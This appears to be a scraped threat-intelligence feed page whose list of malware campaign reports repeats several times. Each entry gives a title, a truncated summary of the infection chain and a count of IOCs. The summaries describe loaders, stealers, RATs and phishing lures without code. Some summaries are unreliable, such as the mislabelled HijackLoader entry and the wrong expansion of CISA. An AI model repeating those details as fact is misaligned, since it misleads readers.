The China-based threat group Water Sigbin, known for deploying cryptocurrency-mining malware, exhibited new techniques to evade detection. It exploited CVE-2017-3506 and CVE-2023-21839 to deploy a PowerShell script executing a miner. The script utilized complex encoding, environment variables to hi…
Downloadable IOCs 9
Gootloader walkthrough
The analysis delves into the intricate workings of the Gootloader malware campaign. Through a meticulously crafted social engineering scheme involving SEO poisoning and fake forums, threat actors lure unsuspecting victims into downloading a malicious JavaScript file disguised as a legitimate resour…
Downloadable IOCs 12
Spring Exacerbation: UAC-0006 increased cyberattacks
This report aims to provide insights into the ongoing cyber operations targeting Ukraine. It analyzes the tactics, techniques, and procedures employed by threat actors in their malicious campaigns. The document offers a comprehensive overview of the cybersecurity landscape in Ukraine, highlighting …
Downloadable IOCs 31
Analysis and Detection of CLOUD#REVERSER: An Attack Involving Threat Actors Compromising Systems Using A Sophisticated Cloud-Based Malware
Securonix Threat Research has uncovered a sophisticated malware campaign, dubbed CLOUD#REVERSER, that leverages popular cloud storage services like Google Drive and Dropbox for malware delivery, command execution, and data exfiltration. The infection chain starts with a phishing email containing a …
Downloadable IOCs 16
Exploring the Metamorfo Banking Trojan
This report delves into a malware campaign known as Metamorfo, a banking Trojan that spreads through malspam campaigns. It entices users to click on HTML attachments, initiating a series of activities focused on gathering system metadata. The infection chain involves obfuscation techniques, URL eva…
Downloadable IOCs 39
Mallox ranomware affiliate leverages PureCrypter in MS-SQL exploitation campaigns
A team from security firm Sekoia has observed a series of attacks targeting vulnerable assets, including MS-SQL, and Mallox ransomware, using techniques similar to that of the PureCrypter ransomware.
Downloadable IOCs 10
Phishing Campaigns Targeting USPS See as Much Web Traffic as the USPS Itself
Following the 2023 holiday season, Akamai researchers uncovered a significant amount of highly likely malicious activity and domains purporting to be associated with the United States Postal Service (USPS). Akamai researchers compared five months of DNS traffic to the legitimate domain, usps.com, w…
Downloadable IOCs 34
From IcedID to Dagon Locker Ransomware in 29 Days
This intrusion started in August 2023 with a phishing campaign that distributed IcedID malware. The phishing operation utilized the Prometheus Traffic Direction System (TDS) to deliver the malware and victims were directed to a fraudulent website, mimicking an Azure download portal.
Downloadable IOCs 33
Unmasking Lumma Stealer: Analyzing Deceptive Tactics with Fake CAPTCHA
Lumma Stealer, a sophisticated information-stealing malware, has evolved its tactics to employ fake CAPTCHA verification for payload delivery. The malware exploits legitimate software and uses multi-stage fileless techniques to evade detection. Its infection chain involves PowerShell scripts, proce…
Downloadable IOCs 23
Beware: Fake Google Meet Pages Deliver Infostealers in Ongoing ClickFix Campaign
Threat actors are using fake Google Meet web pages as part of the ClickFix campaign to deliver infostealers targeting Windows and macOS systems. The attackers display fake error messages in web browsers, tricking users into executing malicious PowerShell code. The campaign has expanded to impersona…
Downloadable IOCs 0
Burning Zero Days: Suspected Nation-State Adversary Targets Ivanti CSA
A zero-day vulnerability exploited by an advanced adversary to gain access to a victim’s network, according to research by FortiGuard Labs and the Centre for Strategic Intelligence (CISA).
Downloadable IOCs 17
HijackLoader evolution: abusing genuine signing certificates
A report by HarfangLab EDR and MITRE ATT&CK on the threat posed by the Lumma Stealer malware, published on 11 October, 2024, outlines the tactics used to deploy the malware.
Downloadable IOCs 69
Malware by the (Bit)Bucket: Uncovering AsyncRAT
A sophisticated attack campaign using Bitbucket as a legitimate platform to deliver AsyncRAT has been uncovered. The multi-stage approach involves a VBScript obfuscation layer, followed by a PowerShell payload delivery mechanism, and culminates in the execution of AsyncRAT. The attackers exploit Bi…
Downloadable IOCs 0
Not All Fun and Games: Lua Malware Targets Educational Sector and Student Gaming Engines
Over the past year, the delivery of Lua malware appears to have undergone simplification, possibly to reduce exposure to detection mechanisms. The malware is frequently delivered using obfuscated Lua scripts instead of compiled Lua bytecode, as the latter can trigger suspicion more easily.
Downloadable IOCs 18
Tweaking AsyncRAT: Using Python and TryCloudflare to Deploy Malware
A new AsyncRAT malware campaign utilizes TryCloudflare quick tunnels and Python packages to deliver malicious payloads. The attack chain involves HTML attachments with 'search-ms' URI protocol handlers, leading to LNK files that download BAT files. These BAT files then retrieve and execute Python s…
Downloadable IOCs 15
PowerShell Keylogger
A newly identified keylogger operating via PowerShell script has been analyzed, revealing its capabilities to capture keystrokes, gather system information, and exfiltrate data. The malware uses a cloud server in Finland as a proxy and an Onion server for C2 communication, ensuring anonymity. It im…
Downloadable IOCs 3
Exploring AsyncRAT and Infostealer Plugin Delivery Through…
This analysis details an AsyncRAT infection observed in August 2024, delivered via email. The attack chain involves a Windows Script File that downloads and executes various scripts, ultimately leading to the installation of AsyncRAT with an infostealer plugin. The malware targets multiple browsers…
Downloadable IOCs 8
Analyzing the Mekotio Trojan
The analysis delves into the Mekotio Trojan, a sophisticated malware that employs a PowerShell dropper to execute its payload. The dropper employs obfuscation techniques, such as custom XOR decryption, to conceal its operations. It collects system information, communicates with a command-and-contro…
Downloadable IOCs 2
Decoding the Stealthy Memory-Only Malware
This intelligence report provides an in-depth analysis of a complex, multi-stage malware campaign called PEAKLIGHT. It details the infection chain, starting with movie lure ZIP files containing malicious LNK files that initiate a JavaScript dropper. This dropper then executes a PowerShell downloade…
Downloadable IOCs 23
Report on Ukraine government attack campaign
Ukraine's government cybersecurity incident response team, CERT-UA, obtained information about the distribution of emails themed around prisoners of war, containing links to download an archive named 'spysok_kursk.zip'. This archive contained a CHM file with JavaScript code that launched an obfusca…
Downloadable IOCs 33
Multiple Malware Dropped Through MSI Package
An analysis reveals the distribution of malware through an MSI package, specifically SectopRat and Redline stealer. The malware employs techniques like executing malicious scripts, disabling security measures, and establishing persistence through scheduled tasks. It communicates with command-and-co…
Downloadable IOCs 11
Unmasking Cronus: How Fake PayPal Documents Execute Fileless Ransomware via PowerShell
The analysis reveals a sophisticated campaign employing fake PayPal receipts as lures to distribute a new variant of the Cronus ransomware. The infection chain begins with a malicious Word document containing an obfuscated VBA macro that downloads a PowerShell loader from a remote server. This load…
Downloadable IOCs 8
Detecting evolving threats: NetSupport RAT campaign
This analysis examines a recent malware campaign that utilizes the NetSupport RAT, a legitimate remote administration tool, for persistent infections. The threat actors behind this campaign employ obfuscation techniques and updates to evade detection. However, by identifying weaknesses in the obfus…
Downloadable IOCs 3
Distribution of AsyncRAT Disguised as Ebook
This analysis covers the distribution of AsyncRAT malware disguised as an ebook. The compressed file contains a malicious LNK and PowerShell scripts that ultimately execute AsyncRAT. The malware employs various techniques, such as obfuscation, task scheduling, and anti-VM and anti-AV capabilities, …
Downloadable IOCs 5
Kimsuky Group’s New Backdoor (HappyDoor)
This report provides a detailed analysis of the HappyDoor malware, a new backdoor utilized by the Kimsuky threat group known for targeting organizations with spear-phishing attacks. The malware employs sophisticated techniques like self-duplication, hidden execution paths, and encrypted communicati…
Downloadable IOCs 7
Turla: A Master of Deception
This report details a recent campaign by the Turla threat group involving malicious LNK files that deliver a fileless backdoor. The attack leverages compromised websites, PowerShell scripts, and MSBuild to deploy the payload, which employs various evasion techniques like disabling security features…
Downloadable IOCs 10
ProxyLogon and ProxyShell Used to Target Government Mail Servers in Asia, Europe, and South America
This analysis describes the identification of a server likely exploiting ProxyLogon and ProxyShell vulnerabilities to gain unauthorized access to government email servers across Asia, Europe, and South America. The threat actor leveraged open-source exploit code to infiltrate systems and steal sens…
Downloadable IOCs 4
Malvertising Campaign Leads to Execution of Oyster Backdoor
Rapid7 has observed a recent malvertising campaign that lures users into downloading malicious installers for popular software such as Google Chrome and Microsoft Teams.
Downloadable IOCs 13
AdsExhaust, a Newly Discovered Adware MasqueradingOculus…
In June 2024, the eSentire Threat Response Unit (TRU) identified adware, which we have dubbed AdsExhaust, being distributed through a fake Oculus installer application. The adware is capable of exfiltrating screenshots from infected devices and interacting with browsers using simulated keystrokes.
Downloadable IOCs 17
FHAPPI Campaign APT10 FreeHosting APT PowerSploit Poison Ivy
This analysis details a malicious campaign dubbed 'FHAPPI' by the researcher, which utilized compromised Geocities Japan accounts to host malware payloads. The campaign leveraged VBScript and PowerShell scripts to execute encoded commands, ultimately delivering the Poison Ivy remote access trojan (…
Downloadable IOCs 5
From Clipboard to Compromise: A PowerShell Self-Pwn
This intelligence report details a unique social engineering technique observed by Proofpoint researchers, leveraging users to copy and paste malicious PowerShell scripts to infect their computers. The threat actors TA571 and ClearFake activity cluster employ this method to deliver malware like Dar…
Downloadable IOCs 14
APT Attacks Using Cloud Storage
The report describes a malicious campaign where threat actors utilize cloud services like Google Drive, OneDrive, and Dropbox to distribute malware and collect user information. The attack process starts with a malicious shortcut file (LNK) that executes PowerShell scripts to download decoy documen…
Downloadable IOCs 1
Warning Against Phishing Emails Prompting Execution of Commands via Paste
This report details a phishing campaign distributing malicious HTML files through emails. The files prompt users to paste and run malicious PowerShell commands that initiate a multi-stage infection process. The campaign ultimately delivers the DarkGate malware, highlighting the importance of exerci…
Downloadable IOCs 15
Decoding Water Sigbin's Latest Obfuscation Tricks
The China-based threat group Water Sigbin, known for deploying cryptocurrency-mining malware, exhibited new techniques to evade detection. It exploited CVE-2017-3506 and CVE-2023-21839 to deploy a PowerShell script executing a miner. The script utilized complex encoding, environment variables to hi…
Downloadable IOCs 9
Gootloader walkthrough
The analysis delves into the intricate workings of the Gootloader malware campaign. Through a meticulously crafted social engineering scheme involving SEO poisoning and fake forums, threat actors lure unsuspecting victims into downloading a malicious JavaScript file disguised as a legitimate resour…
Downloadable IOCs 12
Spring Exacerbation: UAC-0006 increased cyberattacks
This report aims to provide insights into the ongoing cyber operations targeting Ukraine. It analyzes the tactics, techniques, and procedures employed by threat actors in their malicious campaigns. The document offers a comprehensive overview of the cybersecurity landscape in Ukraine, highlighting …
Downloadable IOCs 31
Analysis and Detection of CLOUD#REVERSER: An Attack Involving Threat Actors Compromising Systems Using A Sophisticated Cloud-Based Malware
Securonix Threat Research has uncovered a sophisticated malware campaign, dubbed CLOUD#REVERSER, that leverages popular cloud storage services like Google Drive and Dropbox for malware delivery, command execution, and data exfiltration. The infection chain starts with a phishing email containing a …
Downloadable IOCs 16
Exploring the Metamorfo Banking Trojan
This report delves into a malware campaign known as Metamorfo, a banking Trojan that spreads through malspam campaigns. It entices users to click on HTML attachments, initiating a series of activities focused on gathering system metadata. The infection chain involves obfuscation techniques, URL eva…
Downloadable IOCs 39
Mallox ranomware affiliate leverages PureCrypter in MS-SQL exploitation campaigns
A team from security firm Sekoia has observed a series of attacks targeting vulnerable assets, including MS-SQL, and Mallox ransomware, using techniques similar to that of the PureCrypter ransomware.
Downloadable IOCs 10
Phishing Campaigns Targeting USPS See as Much Web Traffic as the USPS Itself
Following the 2023 holiday season, Akamai researchers uncovered a significant amount of highly likely malicious activity and domains purporting to be associated with the United States Postal Service (USPS). Akamai researchers compared five months of DNS traffic to the legitimate domain, usps.com, w…
Downloadable IOCs 34
From IcedID to Dagon Locker Ransomware in 29 Days
This intrusion started in August 2023 with a phishing campaign that distributed IcedID malware. The phishing operation utilized the Prometheus Traffic Direction System (TDS) to deliver the malware and victims were directed to a fraudulent website, mimicking an Azure download portal.
Downloadable IOCs 33
Unmasking Lumma Stealer: Analyzing Deceptive Tactics with Fake CAPTCHA
Lumma Stealer, a sophisticated information-stealing malware, has evolved its tactics to employ fake CAPTCHA verification for payload delivery. The malware exploits legitimate software and uses multi-stage fileless techniques to evade detection. Its infection chain involves PowerShell scripts, proce…
Downloadable IOCs 23
Beware: Fake Google Meet Pages Deliver Infostealers in Ongoing ClickFix Campaign
Threat actors are using fake Google Meet web pages as part of the ClickFix campaign to deliver infostealers targeting Windows and macOS systems. The attackers display fake error messages in web browsers, tricking users into executing malicious PowerShell code. The campaign has expanded to impersona…
Downloadable IOCs 0
Burning Zero Days: Suspected Nation-State Adversary Targets Ivanti CSA
A zero-day vulnerability exploited by an advanced adversary to gain access to a victim’s network, according to research by FortiGuard Labs and the Centre for Strategic Intelligence (CISA).
Downloadable IOCs 17
HijackLoader evolution: abusing genuine signing certificates
A report by HarfangLab EDR and MITRE ATT&CK on the threat posed by the Lumma Stealer malware, published on 11 October, 2024, outlines the tactics used to deploy the malware.
Downloadable IOCs 69
Malware by the (Bit)Bucket: Uncovering AsyncRAT
A sophisticated attack campaign using Bitbucket as a legitimate platform to deliver AsyncRAT has been uncovered. The multi-stage approach involves a VBScript obfuscation layer, followed by a PowerShell payload delivery mechanism, and culminates in the execution of AsyncRAT. The attackers exploit Bi…
Downloadable IOCs 0
Not All Fun and Games: Lua Malware Targets Educational Sector and Student Gaming Engines
Over the past year, the delivery of Lua malware appears to have undergone simplification, possibly to reduce exposure to detection mechanisms. The malware is frequently delivered using obfuscated Lua scripts instead of compiled Lua bytecode, as the latter can trigger suspicion more easily.
Downloadable IOCs 18
Tweaking AsyncRAT: Using Python and TryCloudflare to Deploy Malware
A new AsyncRAT malware campaign utilizes TryCloudflare quick tunnels and Python packages to deliver malicious payloads. The attack chain involves HTML attachments with 'search-ms' URI protocol handlers, leading to LNK files that download BAT files. These BAT files then retrieve and execute Python s…
Downloadable IOCs 15
PowerShell Keylogger
A newly identified keylogger operating via PowerShell script has been analyzed, revealing its capabilities to capture keystrokes, gather system information, and exfiltrate data. The malware uses a cloud server in Finland as a proxy and an Onion server for C2 communication, ensuring anonymity. It im…
Downloadable IOCs 3
Exploring AsyncRAT and Infostealer Plugin Delivery Through…
This analysis details an AsyncRAT infection observed in August 2024, delivered via email. The attack chain involves a Windows Script File that downloads and executes various scripts, ultimately leading to the installation of AsyncRAT with an infostealer plugin. The malware targets multiple browsers…
Downloadable IOCs 8
Analyzing the Mekotio Trojan
The analysis delves into the Mekotio Trojan, a sophisticated malware that employs a PowerShell dropper to execute its payload. The dropper employs obfuscation techniques, such as custom XOR decryption, to conceal its operations. It collects system information, communicates with a command-and-contro…
Downloadable IOCs 2
Decoding the Stealthy Memory-Only Malware
This intelligence report provides an in-depth analysis of a complex, multi-stage malware campaign called PEAKLIGHT. It details the infection chain, starting with movie lure ZIP files containing malicious LNK files that initiate a JavaScript dropper. This dropper then executes a PowerShell downloade…
Downloadable IOCs 23
Report on Ukraine government attack campaign
Ukraine's government cybersecurity incident response team, CERT-UA, obtained information about the distribution of emails themed around prisoners of war, containing links to download an archive named 'spysok_kursk.zip'. This archive contained a CHM file with JavaScript code that launched an obfusca…
Downloadable IOCs 33
Multiple Malware Dropped Through MSI Package
An analysis reveals the distribution of malware through an MSI package, specifically SectopRat and Redline stealer. The malware employs techniques like executing malicious scripts, disabling security measures, and establishing persistence through scheduled tasks. It communicates with command-and-co…
Downloadable IOCs 11
Unmasking Cronus: How Fake PayPal Documents Execute Fileless Ransomware via PowerShell
The analysis reveals a sophisticated campaign employing fake PayPal receipts as lures to distribute a new variant of the Cronus ransomware. The infection chain begins with a malicious Word document containing an obfuscated VBA macro that downloads a PowerShell loader from a remote server. This load…
Downloadable IOCs 8
Detecting evolving threats: NetSupport RAT campaign
This analysis examines a recent malware campaign that utilizes the NetSupport RAT, a legitimate remote administration tool, for persistent infections. The threat actors behind this campaign employ obfuscation techniques and updates to evade detection. However, by identifying weaknesses in the obfus…
Downloadable IOCs 3
Distribution of AsyncRAT Disguised as Ebook
This analysis covers the distribution of AsyncRAT malware disguised as an ebook. The compressed file contains a malicious LNK and PowerShell scripts that ultimately execute AsyncRAT. The malware employs various techniques, such as obfuscation, task scheduling, and anti-VM and anti-AV capabilities, …
Downloadable IOCs 5
Kimsuky Group’s New Backdoor (HappyDoor)
This report provides a detailed analysis of the HappyDoor malware, a new backdoor utilized by the Kimsuky threat group known for targeting organizations with spear-phishing attacks. The malware employs sophisticated techniques like self-duplication, hidden execution paths, and encrypted communicati…
Downloadable IOCs 7
Turla: A Master of Deception
This report details a recent campaign by the Turla threat group involving malicious LNK files that deliver a fileless backdoor. The attack leverages compromised websites, PowerShell scripts, and MSBuild to deploy the payload, which employs various evasion techniques like disabling security features…
Downloadable IOCs 10
ProxyLogon and ProxyShell Used to Target Government Mail Servers in Asia, Europe, and South America
This analysis describes the identification of a server likely exploiting ProxyLogon and ProxyShell vulnerabilities to gain unauthorized access to government email servers across Asia, Europe, and South America. The threat actor leveraged open-source exploit code to infiltrate systems and steal sens…
Downloadable IOCs 4
Malvertising Campaign Leads to Execution of Oyster Backdoor
Rapid7 has observed a recent malvertising campaign that lures users into downloading malicious installers for popular software such as Google Chrome and Microsoft Teams.
Downloadable IOCs 13
AdsExhaust, a Newly Discovered Adware MasqueradingOculus…
In June 2024, the eSentire Threat Response Unit (TRU) identified adware, which we have dubbed AdsExhaust, being distributed through a fake Oculus installer application. The adware is capable of exfiltrating screenshots from infected devices and interacting with browsers using simulated keystrokes.
Downloadable IOCs 17
FHAPPI Campaign APT10 FreeHosting APT PowerSploit Poison Ivy
This analysis details a malicious campaign dubbed 'FHAPPI' by the researcher, which utilized compromised Geocities Japan accounts to host malware payloads. The campaign leveraged VBScript and PowerShell scripts to execute encoded commands, ultimately delivering the Poison Ivy remote access trojan (…
Downloadable IOCs 5
From Clipboard to Compromise: A PowerShell Self-Pwn
This intelligence report details a unique social engineering technique observed by Proofpoint researchers, leveraging users to copy and paste malicious PowerShell scripts to infect their computers. The threat actors TA571 and ClearFake activity cluster employ this method to deliver malware like Dar…
Downloadable IOCs 14
APT Attacks Using Cloud Storage
The report describes a malicious campaign where threat actors utilize cloud services like Google Drive, OneDrive, and Dropbox to distribute malware and collect user information. The attack process starts with a malicious shortcut file (LNK) that executes PowerShell scripts to download decoy documen…
Downloadable IOCs 1
Warning Against Phishing Emails Prompting Execution of Commands via Paste
This report details a phishing campaign distributing malicious HTML files through emails. The files prompt users to paste and run malicious PowerShell commands that initiate a multi-stage infection process. The campaign ultimately delivers the DarkGate malware, highlighting the importance of exerci…
Downloadable IOCs 15
Decoding Water Sigbin's Latest Obfuscation Tricks
The China-based threat group Water Sigbin, known for deploying cryptocurrency-mining malware, exhibited new techniques to evade detection. It exploited CVE-2017-3506 and CVE-2023-21839 to deploy a PowerShell script executing a miner. The script utilized complex encoding, environment variables to hi…
Downloadable IOCs 9
Gootloader walkthrough
The analysis delves into the intricate workings of the Gootloader malware campaign. Through a meticulously crafted social engineering scheme involving SEO poisoning and fake forums, threat actors lure unsuspecting victims into downloading a malicious JavaScript file disguised as a legitimate resour…
Downloadable IOCs 12
Spring Exacerbation: UAC-0006 increased cyberattacks
This report aims to provide insights into the ongoing cyber operations targeting Ukraine. It analyzes the tactics, techniques, and procedures employed by threat actors in their malicious campaigns. The document offers a comprehensive overview of the cybersecurity landscape in Ukraine, highlighting …
Downloadable IOCs 31
Analysis and Detection of CLOUD#REVERSER: An Attack Involving Threat Actors Compromising Systems Using A Sophisticated Cloud-Based Malware
Securonix Threat Research has uncovered a sophisticated malware campaign, dubbed CLOUD#REVERSER, that leverages popular cloud storage services like Google Drive and Dropbox for malware delivery, command execution, and data exfiltration. The infection chain starts with a phishing email containing a …
Downloadable IOCs 16
Exploring the Metamorfo Banking Trojan
This report delves into a malware campaign known as Metamorfo, a banking Trojan that spreads through malspam campaigns. It entices users to click on HTML attachments, initiating a series of activities focused on gathering system metadata. The infection chain involves obfuscation techniques, URL eva…
Downloadable IOCs 39
Mallox ranomware affiliate leverages PureCrypter in MS-SQL exploitation campaigns
A team from security firm Sekoia has observed a series of attacks targeting vulnerable assets, including MS-SQL, and Mallox ransomware, using techniques similar to that of the PureCrypter ransomware.
Downloadable IOCs 10
Phishing Campaigns Targeting USPS See as Much Web Traffic as the USPS Itself
Following the 2023 holiday season, Akamai researchers uncovered a significant amount of highly likely malicious activity and domains purporting to be associated with the United States Postal Service (USPS). Akamai researchers compared five months of DNS traffic to the legitimate domain, usps.com, w…
Downloadable IOCs 34
From IcedID to Dagon Locker Ransomware in 29 Days
This intrusion started in August 2023 with a phishing campaign that distributed IcedID malware. The phishing operation utilized the Prometheus Traffic Direction System (TDS) to deliver the malware and victims were directed to a fraudulent website, mimicking an Azure download portal.
Downloadable IOCs 33
Unmasking Lumma Stealer: Analyzing Deceptive Tactics with Fake CAPTCHA
Lumma Stealer, a sophisticated information-stealing malware, has evolved its tactics to employ fake CAPTCHA verification for payload delivery. The malware exploits legitimate software and uses multi-stage fileless techniques to evade detection. Its infection chain involves PowerShell scripts, proce…
Downloadable IOCs 23
Beware: Fake Google Meet Pages Deliver Infostealers in Ongoing ClickFix Campaign
Threat actors are using fake Google Meet web pages as part of the ClickFix campaign to deliver infostealers targeting Windows and macOS systems. The attackers display fake error messages in web browsers, tricking users into executing malicious PowerShell code. The campaign has expanded to impersona…
Downloadable IOCs 0
Burning Zero Days: Suspected Nation-State Adversary Targets Ivanti CSA
A zero-day vulnerability exploited by an advanced adversary to gain access to a victim’s network, according to research by FortiGuard Labs and the Centre for Strategic Intelligence (CISA).
Downloadable IOCs 17
HijackLoader evolution: abusing genuine signing certificates
A report by HarfangLab EDR and MITRE ATT&CK on the threat posed by the Lumma Stealer malware, published on 11 October, 2024, outlines the tactics used to deploy the malware.
Downloadable IOCs 69
Malware by the (Bit)Bucket: Uncovering AsyncRAT
A sophisticated attack campaign using Bitbucket as a legitimate platform to deliver AsyncRAT has been uncovered. The multi-stage approach involves a VBScript obfuscation layer, followed by a PowerShell payload delivery mechanism, and culminates in the execution of AsyncRAT. The attackers exploit Bi…
Downloadable IOCs 0
Not All Fun and Games: Lua Malware Targets Educational Sector and Student Gaming Engines
Over the past year, the delivery of Lua malware appears to have undergone simplification, possibly to reduce exposure to detection mechanisms. The malware is frequently delivered using obfuscated Lua scripts instead of compiled Lua bytecode, as the latter can trigger suspicion more easily.
Downloadable IOCs 18
Tweaking AsyncRAT: Using Python and TryCloudflare to Deploy Malware
A new AsyncRAT malware campaign utilizes TryCloudflare quick tunnels and Python packages to deliver malicious payloads. The attack chain involves HTML attachments with 'search-ms' URI protocol handlers, leading to LNK files that download BAT files. These BAT files then retrieve and execute Python s…
Downloadable IOCs 15
PowerShell Keylogger
A newly identified keylogger operating via PowerShell script has been analyzed, revealing its capabilities to capture keystrokes, gather system information, and exfiltrate data. The malware uses a cloud server in Finland as a proxy and an Onion server for C2 communication, ensuring anonymity. It im…
Downloadable IOCs 3
Exploring AsyncRAT and Infostealer Plugin Delivery Through…
This analysis details an AsyncRAT infection observed in August 2024, delivered via email. The attack chain involves a Windows Script File that downloads and executes various scripts, ultimately leading to the installation of AsyncRAT with an infostealer plugin. The malware targets multiple browsers…
Downloadable IOCs 8
Analyzing the Mekotio Trojan
The analysis delves into the Mekotio Trojan, a sophisticated malware that employs a PowerShell dropper to execute its payload. The dropper employs obfuscation techniques, such as custom XOR decryption, to conceal its operations. It collects system information, communicates with a command-and-contro…
Downloadable IOCs 2
Decoding the Stealthy Memory-Only Malware
This intelligence report provides an in-depth analysis of a complex, multi-stage malware campaign called PEAKLIGHT. It details the infection chain, starting with movie lure ZIP files containing malicious LNK files that initiate a JavaScript dropper. This dropper then executes a PowerShell downloade…
Downloadable IOCs 23
Report on Ukraine government attack campaign
Ukraine's government cybersecurity incident response team, CERT-UA, obtained information about the distribution of emails themed around prisoners of war, containing links to download an archive named 'spysok_kursk.zip'. This archive contained a CHM file with JavaScript code that launched an obfusca…
Downloadable IOCs 33
Multiple Malware Dropped Through MSI Package
An analysis reveals the distribution of malware through an MSI package, specifically SectopRat and Redline stealer. The malware employs techniques like executing malicious scripts, disabling security measures, and establishing persistence through scheduled tasks. It communicates with command-and-co…
Downloadable IOCs 11
Unmasking Cronus: How Fake PayPal Documents Execute Fileless Ransomware via PowerShell
The analysis reveals a sophisticated campaign employing fake PayPal receipts as lures to distribute a new variant of the Cronus ransomware. The infection chain begins with a malicious Word document containing an obfuscated VBA macro that downloads a PowerShell loader from a remote server. This load…
Downloadable IOCs 8
Detecting evolving threats: NetSupport RAT campaign
This analysis examines a recent malware campaign that utilizes the NetSupport RAT, a legitimate remote administration tool, for persistent infections. The threat actors behind this campaign employ obfuscation techniques and updates to evade detection. However, by identifying weaknesses in the obfus…
Downloadable IOCs 3
Distribution of AsyncRAT Disguised as Ebook
This analysis covers the distribution of AsyncRAT malware disguised as an ebook. The compressed file contains a malicious LNK and PowerShell scripts that ultimately execute AsyncRAT. The malware employs various techniques, such as obfuscation, task scheduling, and anti-VM and anti-AV capabilities, …
Downloadable IOCs 5
Kimsuky Group’s New Backdoor (HappyDoor)
This report provides a detailed analysis of the HappyDoor malware, a new backdoor utilized by the Kimsuky threat group known for targeting organizations with spear-phishing attacks. The malware employs sophisticated techniques like self-duplication, hidden execution paths, and encrypted communicati…
Downloadable IOCs 7
Turla: A Master of Deception
This report details a recent campaign by the Turla threat group involving malicious LNK files that deliver a fileless backdoor. The attack leverages compromised websites, PowerShell scripts, and MSBuild to deploy the payload, which employs various evasion techniques like disabling security features…
Downloadable IOCs 10
ProxyLogon and ProxyShell Used to Target Government Mail Servers in Asia, Europe, and South America
This analysis describes the identification of a server likely exploiting ProxyLogon and ProxyShell vulnerabilities to gain unauthorized access to government email servers across Asia, Europe, and South America. The threat actor leveraged open-source exploit code to infiltrate systems and steal sens…
Downloadable IOCs 4
Malvertising Campaign Leads to Execution of Oyster Backdoor
Rapid7 has observed a recent malvertising campaign that lures users into downloading malicious installers for popular software such as Google Chrome and Microsoft Teams.
Downloadable IOCs 13
AdsExhaust, a Newly Discovered Adware MasqueradingOculus…
In June 2024, the eSentire Threat Response Unit (TRU) identified adware, which we have dubbed AdsExhaust, being distributed through a fake Oculus installer application. The adware is capable of exfiltrating screenshots from infected devices and interacting with browsers using simulated keystrokes.
Downloadable IOCs 17
FHAPPI Campaign APT10 FreeHosting APT PowerSploit Poison Ivy
This analysis details a malicious campaign dubbed 'FHAPPI' by the researcher, which utilized compromised Geocities Japan accounts to host malware payloads. The campaign leveraged VBScript and PowerShell scripts to execute encoded commands, ultimately delivering the Poison Ivy remote access trojan (…
Downloadable IOCs 5
From Clipboard to Compromise: A PowerShell Self-Pwn
This intelligence report details a unique social engineering technique observed by Proofpoint researchers, leveraging users to copy and paste malicious PowerShell scripts to infect their computers. The threat actors TA571 and ClearFake activity cluster employ this method to deliver malware like Dar…
Downloadable IOCs 14
APT Attacks Using Cloud Storage
The report describes a malicious campaign where threat actors utilize cloud services like Google Drive, OneDrive, and Dropbox to distribute malware and collect user information. The attack process starts with a malicious shortcut file (LNK) that executes PowerShell scripts to download decoy documen…
Downloadable IOCs 1
Warning Against Phishing Emails Prompting Execution of Commands via Paste
This report details a phishing campaign distributing malicious HTML files through emails. The files prompt users to paste and run malicious PowerShell commands that initiate a multi-stage infection process. The campaign ultimately delivers the DarkGate malware, highlighting the importance of exerci…
Downloadable IOCs 15
Decoding Water Sigbin's Latest Obfuscation Tricks
The China-based threat group Water Sigbin, known for deploying cryptocurrency-mining malware, exhibited new techniques to evade detection. It exploited CVE-2017-3506 and CVE-2023-21839 to deploy a PowerShell script executing a miner. The script utilized complex encoding, environment variables to hi…
Downloadable IOCs 9
Gootloader walkthrough
The analysis delves into the intricate workings of the Gootloader malware campaign. Through a meticulously crafted social engineering scheme involving SEO poisoning and fake forums, threat actors lure unsuspecting victims into downloading a malicious JavaScript file disguised as a legitimate resour…
Downloadable IOCs 12
Spring Exacerbation: UAC-0006 increased cyberattacks
This report aims to provide insights into the ongoing cyber operations targeting Ukraine. It analyzes the tactics, techniques, and procedures employed by threat actors in their malicious campaigns. The document offers a comprehensive overview of the cybersecurity landscape in Ukraine, highlighting …
Downloadable IOCs 31
Analysis and Detection of CLOUD#REVERSER: An Attack Involving Threat Actors Compromising Systems Using A Sophisticated Cloud-Based Malware
Securonix Threat Research has uncovered a sophisticated malware campaign, dubbed CLOUD#REVERSER, that leverages popular cloud storage services like Google Drive and Dropbox for malware delivery, command execution, and data exfiltration. The infection chain starts with a phishing email containing a …
Downloadable IOCs 16
Exploring the Metamorfo Banking Trojan
This report delves into a malware campaign known as Metamorfo, a banking Trojan that spreads through malspam campaigns. It entices users to click on HTML attachments, initiating a series of activities focused on gathering system metadata. The infection chain involves obfuscation techniques, URL eva…
Downloadable IOCs 39
Mallox ranomware affiliate leverages PureCrypter in MS-SQL exploitation campaigns
A team from security firm Sekoia has observed a series of attacks targeting vulnerable assets, including MS-SQL, and Mallox ransomware, using techniques similar to that of the PureCrypter ransomware.
Downloadable IOCs 10
Phishing Campaigns Targeting USPS See as Much Web Traffic as the USPS Itself
Following the 2023 holiday season, Akamai researchers uncovered a significant amount of highly likely malicious activity and domains purporting to be associated with the United States Postal Service (USPS). Akamai researchers compared five months of DNS traffic to the legitimate domain, usps.com, w…
Downloadable IOCs 34
From IcedID to Dagon Locker Ransomware in 29 Days
This intrusion started in August 2023 with a phishing campaign that distributed IcedID malware. The phishing operation utilized the Prometheus Traffic Direction System (TDS) to deliver the malware and victims were directed to a fraudulent website, mimicking an Azure download portal.
Downloadable IOCs 33
Unmasking Lumma Stealer: Analyzing Deceptive Tactics with Fake CAPTCHA
Lumma Stealer, a sophisticated information-stealing malware, has evolved its tactics to employ fake CAPTCHA verification for payload delivery. The malware exploits legitimate software and uses multi-stage fileless techniques to evade detection. Its infection chain involves PowerShell scripts, proce…
Downloadable IOCs 23
Beware: Fake Google Meet Pages Deliver Infostealers in Ongoing ClickFix Campaign
Threat actors are using fake Google Meet web pages as part of the ClickFix campaign to deliver infostealers targeting Windows and macOS systems. The attackers display fake error messages in web browsers, tricking users into executing malicious PowerShell code. The campaign has expanded to impersona…
Downloadable IOCs 0
Burning Zero Days: Suspected Nation-State Adversary Targets Ivanti CSA
A zero-day vulnerability exploited by an advanced adversary to gain access to a victim’s network, according to research by FortiGuard Labs and the Centre for Strategic Intelligence (CISA).
Downloadable IOCs 17
HijackLoader evolution: abusing genuine signing certificates
A report by HarfangLab EDR and MITRE ATT&CK on the threat posed by the Lumma Stealer malware, published on 11 October, 2024, outlines the tactics used to deploy the malware.
Downloadable IOCs 69
